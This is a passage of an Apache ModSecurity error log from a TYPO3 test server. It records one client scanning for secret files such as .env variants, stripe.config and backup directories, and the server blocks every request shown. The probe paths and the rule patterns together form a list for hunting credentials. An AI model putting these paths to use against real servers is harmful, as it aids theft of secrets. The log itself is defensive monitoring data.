"ab4L4EXtVMtOWpT4ceI0tAAAAAY"]
[Sat Mar 21 04:09:20.297628 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe.json.backup"] [unique_id "ab4L4EXtVMtOWpT4ceI0tAAAAAY"]
[Sat Mar 21 04:09:20.297801 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stripe.json.backup"] [unique_id "ab4L4EXtVMtOWpT4ceI0tAAAAAY"]
[Sat Mar 21 04:09:20.908431 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/stripe.config"] [unique_id "ab4L4EXtVMtOWpT4ceI0tgAAAAY"]
[Sat Mar 21 04:09:20.908653 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/stripe.config"] [unique_id "ab4L4EXtVMtOWpT4ceI0tgAAAAY"]
[Sat Mar 21 04:09:20.908793 2026] [:error] [pid 2837264] [client 13.54.173.38:38972] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tmp/stripe.config"] [unique_id "ab4L4EXtVMtOWpT4ceI0tgAAAAY"]
[Sat Mar 21 04:09:39.211249 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Sat Mar 21 04:09:39.829487 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/vendor
[Sat Mar 21 04:09:40.123883 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/lib
[Sat Mar 21 04:09:40.418484 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sat Mar 21 04:09:40.712723 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/core
[Sat Mar 21 04:09:41.007086 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin
[Sat Mar 21 04:09:41.301499 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Mar 21 04:09:41.596001 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Sat Mar 21 04:09:41.891062 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/public
[Sat Mar 21 04:09:42.185396 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/assets
[Sat Mar 21 04:09:42.481358 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/uploads
[Sat Mar 21 04:09:42.776137 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/laravel
[Sat Mar 21 04:09:43.070631 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wordpress
[Sat Mar 21 04:09:43.365097 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Sat Mar 21 04:09:43.659471 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/old
[Sat Mar 21 04:09:43.954929 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Sat Mar 21 04:09:44.249226 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test
[Sat Mar 21 04:09:44.543988 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dev
[Sat Mar 21 04:09:44.838283 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/staging
[Sat Mar 21 04:09:45.132701 2026] [authz_core:error] [pid 2836924] [client 13.54.173.38:46228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/production
[Sat Mar 21 04:09:45.580961 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stripe"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stripe"] [unique_id "ab4L-dTas8ZTYtMe0Y3QpgAAAAE"]
[Sat Mar 21 04:09:45.581117 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stripe"] [unique_id "ab4L-dTas8ZTYtMe0Y3QpgAAAAE"]
[Sat Mar 21 04:09:45.581267 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stripe"] [unique_id "ab4L-dTas8ZTYtMe0Y3QpgAAAAE"]
[Sat Mar 21 04:09:45.875577 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.stripe"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.stripe"] [unique_id "ab4L-dTas8ZTYtMe0Y3QpwAAAAE"]
[Sat Mar 21 04:09:45.875739 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.stripe"] [unique_id "ab4L-dTas8ZTYtMe0Y3QpwAAAAE"]
[Sat Mar 21 04:09:45.875900 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.stripe"] [unique_id "ab4L-dTas8ZTYtMe0Y3QpwAAAAE"]
[Sat Mar 21 04:09:46.170436 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.payment"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.payment"] [unique_id "ab4L-tTas8ZTYtMe0Y3QqAAAAAE"]
[Sat Mar 21 04:09:46.170592 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.payment"] [unique_id "ab4L-tTas8ZTYtMe0Y3QqAAAAAE"]
[Sat Mar 21 04:09:46.170764 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.payment"] [unique_id "ab4L-tTas8ZTYtMe0Y3QqAAAAAE"]
[Sat Mar 21 04:09:47.080462 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /functions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QqwAAAAE"]
[Sat Mar 21 04:09:47.080622 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QqwAAAAE"]
[Sat Mar 21 04:09:47.080791 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QqwAAAAE"]
[Sat Mar 21 04:09:47.375459 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dist/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QrAAAAAE"]
[Sat Mar 21 04:09:47.375622 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dist/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QrAAAAAE"]
[Sat Mar 21 04:09:47.375795 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dist/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QrAAAAAE"]
[Sat Mar 21 04:09:47.670210 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QrQAAAAE"]
[Sat Mar 21 04:09:47.670412 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QrQAAAAE"]
[Sat Mar 21 04:09:47.670571 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "ab4L-9Tas8ZTYtMe0Y3QrQAAAAE"]
[Sat Mar 21 04:09:48.579265 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "ab4L_NTas8ZTYtMe0Y3QsAAAAAE"]
[Sat Mar 21 04:09:48.579426 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "ab4L_NTas8ZTYtMe0Y3QsAAAAAE"]
[Sat Mar 21 04:09:48.579579 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "ab4L_NTas8ZTYtMe0Y3QsAAAAAE"]
[Sat Mar 21 04:09:48.874267 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.production"] [unique_id "ab4L_NTas8ZTYtMe0Y3QsQAAAAE"]
[Sat Mar 21 04:09:48.874452 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.production"] [unique_id "ab4L_NTas8ZTYtMe0Y3QsQAAAAE"]
[Sat Mar 21 04:09:48.874606 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.production"] [unique_id "ab4L_NTas8ZTYtMe0Y3QsQAAAAE"]
[Sat Mar 21 04:09:49.168896 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.staging"] [unique_id "ab4L_dTas8ZTYtMe0Y3QsgAAAAE"]
[Sat Mar 21 04:09:49.169057 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.staging"] [unique_id "ab4L_dTas8ZTYtMe0Y3QsgAAAAE"]
[Sat Mar 21 04:09:49.169226 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env.staging"] [unique_id "ab4L_dTas8ZTYtMe0Y3QsgAAAAE"]
[Sat Mar 21 04:09:49.463517 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "ab4L_dTas8ZTYtMe0Y3QswAAAAE"]
[Sat Mar 21 04:09:49.463673 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "ab4L_dTas8ZTYtMe0Y3QswAAAAE"]
[Sat Mar 21 04:09:49.463844 2026] [:error] [pid 2836924] [client 13.54.173.38:46228] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "ab4L_dTas8ZTYtMe0Y3QswAAAAE"]
